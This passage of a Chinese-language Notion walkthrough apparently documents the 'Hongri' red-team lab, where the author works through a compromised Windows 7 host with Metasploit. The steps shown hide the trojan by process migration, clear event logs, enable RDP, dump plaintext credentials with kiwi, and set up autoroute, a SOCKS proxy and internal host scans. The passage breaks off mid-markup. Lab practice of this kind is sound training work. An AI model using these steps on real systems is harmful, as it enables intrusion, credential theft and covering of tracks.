src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5be8412d-56bf-4dd0-b9fa-e52c4ceb1017%2FUntitled.png?table=block&amp;id=eef4f754-fa69-4223-bd3a-8623b1a1e457&amp;t=eef4f754-fa69-4223-bd3a-8623b1a1e457&amp;width=724&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-65eec75aa29b49649d2831acc22b2db1">msf监听</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-48ca15a9a6aa46a89ed3e4c59c411c0f"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F8e585fc3-ee69-4656-9685-943318157122%2FUntitled.png?table=block&amp;id=48ca15a9-a6aa-46a8-9ed3-e4c59c411c0f&amp;t=48ca15a9-a6aa-46a8-9ed3-e4c59c411c0f&amp;width=1162&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-6b3a2f94012448a1a97d988194fa03b6">上线，<code class="notion-inline-code">getuid</code>查看用户</div><div class="notion-text notion-block-42f0563208124b7d96f50ef39df940dc">ps可以查看马子的进程（shell.exe是后面的cs马）</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-b3620fd60bea45379b4090ed6b27c9ac"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F958ad984-3ca1-42ac-9b37-b247a6034b9d%2FUntitled.png?table=block&amp;id=b3620fd6-0bea-4537-9b40-90ed6b27c9ac&amp;t=b3620fd6-0bea-4537-9b40-90ed6b27c9ac&amp;width=720&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-9c918459dffa468cb232d3686218a34d">这里看见马子msf.exe进程pid是1028</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-30062b0228dc468ea33ff2f455f47c0d"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F4fcafc28-3e00-4147-bbe1-b6958d9c54fd%2FUntitled.png?table=block&amp;id=30062b02-28dc-468e-a33f-f2f455f47c0d&amp;t=30062b02-28dc-468e-a33f-f2f455f47c0d&amp;width=1075&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-c6c56a7634024d759d64959fd4762056">apache的进程是4440</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-1cdd36c85295475e9ce62b5cb1fd22eb"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F415bf839-c76d-4d9e-b29f-10e56d19c1a3%2FUntitled.png?table=block&amp;id=1cdd36c8-5295-475e-9ce6-2b5cb1fd22eb&amp;t=1cdd36c8-5295-475e-9ce6-2b5cb1fd22eb&amp;width=1107&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-7f2446c1dab041b9a6b0a8ee81c4adc8" data-id="7f2446c1dab041b9a6b0a8ee81c4adc8"><span><div id="7f2446c1dab041b9a6b0a8ee81c4adc8" class="notion-header-anchor"></div><a class="notion-hash-link" href="#7f2446c1dab041b9a6b0a8ee81c4adc8" title="进程迁移"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">进程迁移</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4c97b73e33404f4d83db88465da2da8f"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F50835f44-2509-44d9-8f7e-1070ca54dd5f%2FUntitled.png?table=block&amp;id=4c97b73e-3340-4f4d-83db-88465da2da8f&amp;t=4c97b73e-3340-4f4d-83db-88465da2da8f&amp;width=751&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-6eff71430bc14df2baa7311a1db532b3">为了防止目标服务器检查到我们上传的hack.exe木马，我们可以将进程迁移到其他正常进程，</div><div class="notion-text notion-block-7a5c9a510cb34d448c4b2da0032858ce">这里我的hack.exe木马进程id是1028，Apache进程是4440</div><div class="notion-blank notion-block-5b1584073b444c99a35ff82a1c9a3550"> </div><div class="notion-text notion-block-958e25f046a244c093e584b1b60bbb50">然后清除痕迹clearev</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-5fb071dd55b64caca95b775ff45ea861"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:672px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0a0e2e18-48b2-4a1f-aa3b-7d58045e1891%2FUntitled.png?table=block&amp;id=5fb071dd-55b6-4cac-a95b-775ff45ea861&amp;t=5fb071dd-55b6-4cac-a95b-775ff45ea861&amp;width=672&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-d752616f5d76472e8c81334716a13d7c"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-c54dbf82053b49118366719d8344b3a6" data-id="c54dbf82053b49118366719d8344b3a6"><span><div id="c54dbf82053b49118366719d8344b3a6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#c54dbf82053b49118366719d8344b3a6" title="关闭防火墙"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">关闭防火墙</span></span></h4><div class="notion-text notion-block-3383457455534c518d11cb0401eab629"><code class="notion-inline-code">run post/windows/manage/enable_rdp</code> </div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-58d83090b3a548d5b7ab99095d3a4d1a"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fbf041980-db4b-49ff-a2bd-6463a1db1d4d%2FUntitled.png?table=block&amp;id=58d83090-b3a5-48d5-b7ab-99095d3a4d1a&amp;t=58d83090-b3a5-48d5-b7ab-99095d3a4d1a&amp;width=1121&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-5963e7ac56a545c0a7caa1b496134288"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-8ffd166f10f244baa5587b54358e4cfb" data-id="8ffd166f10f244baa5587b54358e4cfb"><span><div id="8ffd166f10f244baa5587b54358e4cfb" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8ffd166f10f244baa5587b54358e4cfb" title="开远程桌面"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">开远程桌面</span></span></h4><div class="notion-text notion-block-9225e33ceee144d6b098dc1cf5feea04">rdesktop 192.168.52.128</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-d3f9dd74d4df44258b6aba1ffaf94ba3"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fae4d9e40-043d-4f1f-9d62-a3016bef7cf9%2FUntitled.png?table=block&amp;id=d3f9dd74-d4df-4425-8b6a-ba1ffaf94ba3&amp;t=d3f9dd74-d4df-4425-8b6a-ba1ffaf94ba3&amp;width=1142&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-ada1e41ca1084c9298640c37637953da"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F53f3048d-d109-4642-b3f2-8de2534c80e1%2FUntitled.png?table=block&amp;id=ada1e41c-a108-4c92-9864-0c37637953da&amp;t=ada1e41c-a108-4c92-9864-0c37637953da&amp;width=1234&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-676354a9f3714d46b7bc189d85c5ca3f"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-baeb1901e4c74a50811f42b68a6c0465" data-id="baeb1901e4c74a50811f42b68a6c0465"><span><div id="baeb1901e4c74a50811f42b68a6c0465" class="notion-header-anchor"></div><a class="notion-hash-link" href="#baeb1901e4c74a50811f42b68a6c0465" title="抓取hash"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">抓取hash</span></span></h4><div class="notion-blank notion-block-17864b86fb0a42ce9c463f817dfbdeb5"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-f23a97af55804e92be1913029b2f801f" data-id="f23a97af55804e92be1913029b2f801f"><span><div id="f23a97af55804e92be1913029b2f801f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#f23a97af55804e92be1913029b2f801f" title="使用kiwi（mimikazt平替）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">使用kiwi（mimikazt平替）</span></span></h4><div class="notion-text notion-block-11dcc2502e63432b8781a807b1ee48a6">kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。如果目标系统是32位的，则没有这个限制</div><div class="notion-blank notion-block-2bd5e277890140bea73e527339c3a316"> </div><div class="notion-text notion-block-0d73623d0a1942e1997613b833eee193">由于对象是64位win7，接下来要将进程迁移到其中一个64位程序</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-b84b8e236d174a18a2f7f2fe2cf55d75"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcb8c4237-5a5c-4a98-80a2-1f2690c52ff0%2FUntitled.png?table=block&amp;id=b84b8e23-6d17-4a18-a2f7-f2fe2cf55d75&amp;t=b84b8e23-6d17-4a18-a2f7-f2fe2cf55d75&amp;width=857&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-c144ac8697824af99bdc6d9910abe79e"> </div><div class="notion-text notion-block-b741996afd6d4baab45c3bf4dfef8a65">发现需要system权限后又转去了516进程</div><div class="notion-text notion-block-3780a881edaa4bef9da486426b3c4a15"><code class="notion-inline-code">migrate 516</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-728d9424d9054ba492e44ef309113305"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F4eeddc36-97f0-4cc9-a5fa-514e14057c9c%2FUntitled.png?table=block&amp;id=728d9424-d905-4ba4-92e4-4ef309113305&amp;t=728d9424-d905-4ba4-92e4-4ef309113305&amp;width=891&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-8342174bc7b34cb18faf455d329084b7"><code class="notion-inline-code">load kiwi</code></div><div class="notion-text notion-block-5cbf114ffaed49b2ab2d6ae7c31d2b1d"><code class="notion-inline-code">creds_all</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-119e52b7d51f4d8ead6fd56b7082e626"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fab810bbb-200a-4436-9373-ddfaad274c49%2FUntitled.png?table=block&amp;id=119e52b7-d51f-4d8e-ad6f-d56b7082e626&amp;t=119e52b7-d51f-4d8e-ad6f-d56b7082e626&amp;width=1715&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-6880fbcfbaf7491a9fc7c4f3fb1610fc"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-3fb65da7bc3147cd986a121091faf8ff" data-id="3fb65da7bc3147cd986a121091faf8ff"><span><div id="3fb65da7bc3147cd986a121091faf8ff" class="notion-header-anchor"></div><a class="notion-hash-link" href="#3fb65da7bc3147cd986a121091faf8ff" title="msf搭建代理"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">msf搭建代理</span></span></h4><div class="notion-text notion-block-b2b6132883e042028d32d2a03410f634"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.freebuf.com/articles/web/324441.html">ATT&amp;CK红队评估（红日靶场一） - FreeBuf网络安全行业门户</a></div><div class="notion-text notion-block-034d507b72684167b9afb6011cf3ed34">①msf连接受害主机</div><div class="notion-text notion-block-ca01f89edc4e4a598020de3360d54b86">②新建路由</div><div class="notion-text notion-block-cf0189c5642944b3af721c7f3fed83c0"><code class="notion-inline-code">run post/multi/manage/autoroute</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-b3cd63e6c481416ca4efb45c90d0cf79"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Feb80c951-a9f4-4f4d-a81b-c62260953010%2FUntitled.png?table=block&amp;id=b3cd63e6-c481-416c-a4ef-b45c90d0cf79&amp;t=b3cd63e6-c481-416c-a4ef-b45c90d0cf79&amp;width=744&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-9bace782c7a640afbbf06f1e177431ff">查看路由</div><div class="notion-text notion-block-8387f4a7e6d145cf9a57ba22dd5dac97"><code class="notion-inline-code">run autoroute -p</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-c95aa6cf8a65464eb83dc023f2df6bfd"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:640px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc3143e82-23fa-4c01-9d64-7a4369d8aafd%2FUntitled.png?table=block&amp;id=c95aa6cf-8a65-464e-b83d-c023f2df6bfd&amp;t=c95aa6cf-8a65-464e-b83d-c023f2df6bfd&amp;width=640&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-01b1afb1b45f4f1680f12dac6343550e">挂起会话，建立socks</div><div class="notion-text notion-block-33a2939e9ff74c92bc96799513d86127"><code class="notion-inline-code">background</code>     #挂起会话</div><div class="notion-text notion-block-d6f32fd33e59414cac1d23b5008c270e"><code class="notion-inline-code">use auxiliary/server/socks_proxy</code></div><div class="notion-text notion-block-4b396b76785046e99fb347c852d36504"><code class="notion-inline-code">set VERSION 4a</code></div><div class="notion-text notion-block-58c146bea4e047b292e90f73ca6e5508"><code class="notion-inline-code">set SRVHOST 127.0.0.1</code></div><div class="notion-text notion-block-1b8dcb0b9e1248548da141b432c5577c"><code class="notion-inline-code">options</code>           #查看使用的参数</div><div class="notion-text notion-block-19bcb92a3ec547d6abc77629fd265d52"><code class="notion-inline-code">exploit</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-f5fa9f530f0946ea8f4cace69d2754ad"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6c46b6f4-f3ba-46fe-8241-dfec73ec5ea3%2FUntitled.png?table=block&amp;id=f5fa9f53-0f09-46ea-8f4c-ace69d2754ad&amp;t=f5fa9f53-0f09-46ea-8f4c-ace69d2754ad&amp;width=959&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-4c5ec8fa6e9f4f19b65a182ad070b1ee">成功后出现一个job（攻击任务）</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-209106ff759749c396a6e7fe3a96a50f"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:495px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fe6c3a96d-6235-49a1-91e6-0fc9a78b1e4e%2FUntitled.png?table=block&amp;id=209106ff-7597-49c3-96a6-e7fe3a96a50f&amp;t=209106ff-7597-49c3-96a6-e7fe3a96a50f&amp;width=495&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-102a313e0b0641939a4e50b9422ab414"><code class="notion-inline-code">jobs</code>查看</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-c963b5dd181b4ce1bec1f70834b9b7aa"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:570px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0522cc4e-cd2d-46a8-899b-7def826549e2%2FUntitled.png?table=block&amp;id=c963b5dd-181b-4ce1-bec1-f70834b9b7aa&amp;t=c963b5dd-181b-4ce1-bec1-f70834b9b7aa&amp;width=570&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-752af753afde49ce9e34267f8bfbddb1">修改proxychains.conf，如图</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-9563f9c24b3e4432be665461bfb9fec4"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:262px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2e8f4ac6-6ea4-4f85-b14d-114c4f2e0f3a%2FUntitled.png?table=block&amp;id=9563f9c2-4b3e-4432-be66-5461bfb9fec4&amp;t=9563f9c2-4b3e-4432-be66-5461bfb9fec4&amp;width=262&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-de1ab1065b1f4de88ddab26d3a7a889a">基本上参照上面你建立socks那一步的参数来添加进去</div><div class="notion-text notion-block-4ad1d69e71664cda965ef4a6a253aa02">（其他教程用的是proxychains4.conf？我报错这里说用的是proxychans.conf）</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-791db197f3da454691ffc14c9ef6a691"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:701px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Feaaf4b1f-b8e1-40ba-9300-d7e7142be369%2FUntitled.png?table=block&amp;id=791db197-f3da-4546-91ff-c14c9ef6a691&amp;t=791db197-f3da-4546-91ff-c14c9ef6a691&amp;width=701&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-7e1a0e2e18d84eb3ab7c967a743633b6">使用代理只要像上面的指令前加上proxychains就可以了</div><div class="notion-blank notion-block-63c08983710542af912736573bdf802b"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-66523fc70ab248ec994ecabc2395c804" data-id="66523fc70ab248ec994ecabc2395c804"><span><div id="66523fc70ab248ec994ecabc2395c804" class="notion-header-anchor"></div><a class="notion-hash-link" href="#66523fc70ab248ec994ecabc2395c804" title="扫描内网存活主机"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">扫描内网存活主机</span></span></h4><div class="notion-text notion-block-4ae13403c4ed4cfd9c040c90227b567e"><code class="notion-inline-code">use post/windows/gather/arp_scanner</code></div><div class="notion-text notion-block-d59fe953cf3246eeac549ee00f45e3b9"><code class="notion-inline-code">set RHOSTS 192.168.52.0/24</code></div><div class="notion-text notion-block-1b7f4283aa9f4f85892acfdf7cb15860"><code class="notion-inline-code">set SESSION 1</code>  #指定会话1（我图片指定了session2，<code class="notion-inline-code">session -l</code>查看后台会话）</div><div class="notion-text notion-block-b091fa0ce4b040c6b35d1f25652f809f"><code class="notion-inline-code">exploit</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-854ef9ed48ac4a2a8aa5bcfa21aa8e02"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F49a307a6-e5b6-4f32-9341-f694ca86207e%2FUntitled.png?table=block&amp;id=854ef9ed-48ac-4a2a-8aa5-bcfa21aa8e02&amp;t=854ef9ed-48ac-4a2a-8aa5-bcfa21aa8e02&amp;width=800&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-c8a3cae7704e4436a0b231826e3008f0"> </div><div class="notion-text notion-block-2feea91774d3453c9df3345bea91959e">udp协议发现内网存活主机</div><div class="notion-text notion-block-ffb3cf6c253e498e9a9ec3d0dd382bc2"><code class="notion-inline-code">use auxiliary/scanner/discovery/udp_sweep</code></div><div class="notion-text notion-block-b5ebfc5815d74f22800680f5145fe5dd"><code class="notion-inline-code">set RHOSTS 192.168.52.0/24</code></div><div class="notion-text notion-block-387ebd7dfc014c9587cc824679cbbf11"><code class="notion-inline-code">exploit</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-682066519f9c4bd8b799c71cd7d75f2a"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc05aead4-a47a-419f-8a51-7c52273e9afa%2FUntitled.png?table=block&amp;id=68206651-9f9c-4bd8-b799-c71cd7d75f2a&amp;t=68206651-9f9c-4bd8-b799-c71cd7d75f2a&amp;width=948&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-e6f6e902e8364c15b143901e0267049e"> </div><div class="notion-text notion-block-fd3c2b42063b4f75ace5d001efdb8d08">结合来看，内网中有三台主机128（代理用的受害主机）、138、141</div><div class="notion-blank notion-block-2c993c5f90f14dbaa50bb16df988a547"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-7fe7d76ec7474d1eafaae08cc9b329d3" data-id="7fe7d76ec7474d1eafaae08cc9b329d3"><span><div id="7fe7d76ec7474d1eafaae08cc9b329d3" class="notion-header-anchor"></div><a class="notion-hash-link" href="#7fe7d76ec7474d1eafaae08cc9b329d3" title="内网横移"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">内网横移</span></span></h4><div class="notion-text notion-block-7f15883465ef43339f2812449174da54">不知道为什么我这一步扫出的端口很少</div><div class="notion-blank notion-block-1ab38a7e66ec4e29a35896555e8c9034"> </div><div class="notion-text notion-block-9f3600905ec2476fbe3581971696cbde">192.168.52.138</div><div class="notion-text notion-block-78879953da2b4916bc16e0eea1a718d8">端口扫描</div><div class="notion-text notion-block-352a5507796d490b9d27fe017fd9d336">开放了25、110端口</div><div class="notion-text notion-block-4e73181599194e11989c1989ab928d24">扫描tcp：25，110端口</div><div class="notion-blank notion-block-7f38487e22924d5fa8e99a81bd53fd0f"> </div><div class="notion-blank notion-block-0941f05fbf2d4912af1a7e08b2bf5229"> </div><div class="notion-text notion-block-73fa52bd756a4fff84f77267c10738b9">192.168.52.141</div><div class="notion-text notion-block-4ebf838989af46f886110cfe03a5d393">端口扫描</div><div class="notion-text notion-block-2f8633efadf948059ab28c0896d6fb37">开放了25、110端口</div><div class="notion-text 